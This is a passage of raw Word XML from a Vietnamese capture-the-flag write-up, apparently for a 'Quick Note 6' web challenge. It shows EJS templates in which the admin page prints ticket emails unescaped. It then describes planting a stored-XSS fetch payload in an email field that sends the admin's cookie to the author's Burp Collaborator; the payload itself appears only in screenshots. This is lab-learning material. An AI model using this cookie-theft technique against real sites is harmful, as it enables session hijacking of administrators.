            <w:r w:rsidRPr="00B929D6">
              <w:t>  &lt;a href="/logout"&gt;Logout&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D628C12" w14:textId="2224A0C7" w:rsidR="006420C6" w:rsidRPr="00377B0F" w:rsidRDefault="00B929D6" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B929D6">
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43989B83" w14:textId="5978183B" w:rsidR="00841552" w:rsidRDefault="002412E1" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Đoạn code chào mừng Welcome vẫn như level 5 sử dụng cấu trúc </w:t>
      </w:r>
      <w:r w:rsidRPr="00B929D6">
        <w:t>&lt;%=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; để </w:t>
      </w:r>
      <w:r w:rsidR="00530DA0">
        <w:t>escape nội dung email bên trong đó.</w:t>
      </w:r>
      <w:r w:rsidR="00993404">
        <w:t xml:space="preserve"> Cùng đó sử dụng 1 form để gửi thông tin</w:t>
      </w:r>
      <w:r w:rsidR="00300D4F">
        <w:t xml:space="preserve"> trong trường</w:t>
      </w:r>
      <w:r w:rsidR="00993404">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00300D4F">
        <w:t xml:space="preserve">content </w:t>
      </w:r>
      <w:r w:rsidR="00993404">
        <w:t>đến endpoint ticket.</w:t>
      </w:r>
      <w:r w:rsidR="00530DA0">
        <w:t xml:space="preserve"> Tuy nhiên ở trang admin lại có một điều khá thú vị:</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2E2A7F" w:rsidRPr="00377B0F" w14:paraId="3AA03392" w14:textId="77777777" w:rsidTr="008E26EB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B64738B" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B16F57" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D094043" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F31425" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4658A60F" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E76663" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354FD51C" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRPr="008E43EE" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AF5149" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E43EE">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACE4D9D" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47844FAF" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39F1C9A3" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D233D20" w14:textId="77777777" w:rsidR="002E2A7F" w:rsidRDefault="002E2A7F" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C04C080" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2657FA" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC3FB91" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DEB8B2" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547959DA" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CD09F8" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0989AB2D" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC011FF" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C213E61" w14:textId="77777777" w:rsidR="00243573" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD13C9F" w14:textId="7639BAE1" w:rsidR="00243573" w:rsidRPr="00377B0F" w:rsidRDefault="00243573" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B52470C" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:lastRenderedPageBreak/>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7C5613" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;h1&gt;Quick Note 6 - Admin panel&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FEF204" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4997587F" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;table&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2AE032" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>        &lt;tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE7B2C2" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>            &lt;td&gt;&lt;b&gt;Email&lt;/b&gt;&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC19917" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>            &lt;td&gt;&lt;b&gt;Content&lt;/b&gt;&lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1ACE50" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>        &lt;/tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0169AD6E" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>        &lt;% for(var i in tickets) { %&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2F0AAF" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>            &lt;tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB9BE7A" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>                &lt;td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CD50FE" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>                    &lt;%- tickets[i].email %&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A91816" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>                &lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560DC87A" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>                &lt;td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69D0CAE8" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>                    &lt;%= tickets[i].content %&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A051747" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:lastRenderedPageBreak/>
              <w:t>                &lt;/td&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="005AAEFA" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>            &lt;/tr&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F7586E" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>            &lt;% } %&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790842DC" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;/table&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF9E469" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29BC7EF7" w14:textId="77777777" w:rsidR="00BF65F3" w:rsidRPr="00BF65F3" w:rsidRDefault="00BF65F3" w:rsidP="00BF65F3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>    &lt;a href="/logout"&gt;Logout&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E00AAAB" w14:textId="1FC33CD5" w:rsidR="002E2A7F" w:rsidRPr="00377B0F" w:rsidRDefault="00BF65F3" w:rsidP="008E26EB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00BF65F3">
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D181858" w14:textId="313B3F82" w:rsidR="002E2A7F" w:rsidRDefault="00300D4F" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đoạn code này thực </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21A68">
        <w:t xml:space="preserve">hiện </w:t>
      </w:r>
      <w:r w:rsidR="00A21A68" w:rsidRPr="00A21A68">
        <w:t>lấy thông tin toàn bộ email và content</w:t>
      </w:r>
      <w:r w:rsidR="00A21A68">
        <w:t xml:space="preserve"> được lưu trên ticket và in nó ra với </w:t>
      </w:r>
      <w:r w:rsidR="00A21A68" w:rsidRPr="00A21A68">
        <w:t xml:space="preserve">Dấu trong EJS chèn nội dung không escape vào HTML, nên nếu tickets[i].email chứa chuỗi HTML/JS độc </w:t>
      </w:r>
      <w:r w:rsidR="00A21A68">
        <w:t xml:space="preserve">hại, </w:t>
      </w:r>
      <w:r w:rsidR="00A21A68" w:rsidRPr="00A21A68">
        <w:t>trình duyệt sẽ thực thi và gây XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AD93A" w14:textId="77777777" w:rsidR="006420C6" w:rsidRPr="00CF619D" w:rsidRDefault="006420C6" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C4010" w14:textId="38AC2230" w:rsidR="006420C6" w:rsidRPr="0089215E" w:rsidRDefault="006420C6" w:rsidP="006420C6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00397974">
        <w:t xml:space="preserve">tạo một email chứa payload XSS rồi gửi 1 giá trị trên content đến admin. </w:t>
      </w:r>
      <w:r w:rsidR="009B4BCE">
        <w:t xml:space="preserve">Sau đó chờ đợi admin truy cập vào trang admin khiến </w:t>
      </w:r>
      <w:r w:rsidR="009B4BCE" w:rsidRPr="009B4BCE">
        <w:t>hệ thống xử lý và hiển thị nội dung bên ngoài khi tiếp nhận email</w:t>
      </w:r>
      <w:r w:rsidR="009B4BCE">
        <w:t xml:space="preserve"> khiến cho payload XSS được thực thi thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31729648" w14:textId="77777777" w:rsidR="006420C6" w:rsidRDefault="006420C6" w:rsidP="006420C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24928300" w14:textId="5A33E8AE" w:rsidR="00E31AE1" w:rsidRPr="00E31AE1" w:rsidRDefault="00E31AE1" w:rsidP="003D1A87">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="003D1A87">
        <w:t>tạo email với lệnh javascript với lệnh fetch nhằm thực thiện out of band gửi request sang Burp Collaborator của mình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0EE9C6" w14:textId="54EF88E4" w:rsidR="00511622" w:rsidRDefault="00053920" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00053920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04638300" wp14:editId="5264FD11">
            <wp:extent cx="5731510" cy="1990725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="64247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670" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1990725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC85E98" w14:textId="687D6A51" w:rsidR="003D1A87" w:rsidRDefault="003D1A87" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo thành công email và truy cập vào trang chào mừng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A155F4" w14:textId="4560E46D" w:rsidR="00511622" w:rsidRDefault="00053920" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00053920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3127F5A7" wp14:editId="0DCC41C4">
            <wp:extent cx="5731510" cy="1849120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="726973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73471" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1849120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAAB8BD" w14:textId="57EF17ED" w:rsidR="002949EF" w:rsidRDefault="002949EF" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho thấy email đã được escape hoàn toàn, không thể thực hiện XSS ở vị trí này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE393A" w14:textId="11BF8F92" w:rsidR="002949EF" w:rsidRDefault="002949EF" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp đó thực hiện gửi một nội dụng hello sang cho admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBA802D" w14:textId="05834C9D" w:rsidR="006420C6" w:rsidRDefault="00053920" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00053920">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="191ECE6C" wp14:editId="17713A3B">
            <wp:extent cx="5731510" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="303356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6470" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1767840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203DF7D8" w14:textId="66769FC7" w:rsidR="0022766E" w:rsidRDefault="0022766E" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0022766E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDC86CF" wp14:editId="1B3C9E2C">
            <wp:extent cx="5096586" cy="1171739"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28835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5092" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5096586" cy="1171739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FBC09E" w14:textId="2920F5AA" w:rsidR="002949EF" w:rsidRDefault="002949EF" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau một thời gian chờ đợi, có một gói tin HTTP đã được gửi tới Burp Collaborator, chứng tỏ rằng admin đã truy cập vào endpoint /admin khiến payload XSS được thực thi thành công và gửi cookie của admin sang:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2689A" w14:textId="3769350C" w:rsidR="002B18E2" w:rsidRDefault="002B18E2" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002B18E2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A24E5EC" wp14:editId="0A65499B">
            <wp:extent cx="5731510" cy="1202055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8707358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35841" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1202055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A41D36" w14:textId="3561A86D" w:rsidR="00001814" w:rsidRDefault="005B72CD" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sau đó truy cập vào endpoint /admin, do không có cookie nên trang web hiển thị trường đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D44D3" w14:textId="71944E62" w:rsidR="000B27B9" w:rsidRDefault="00001814" w:rsidP="00A3783F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00001814">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="618FF1A5" wp14:editId="1F9F95A1">
            <wp:extent cx="5731510" cy="1795780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2046783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83909" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
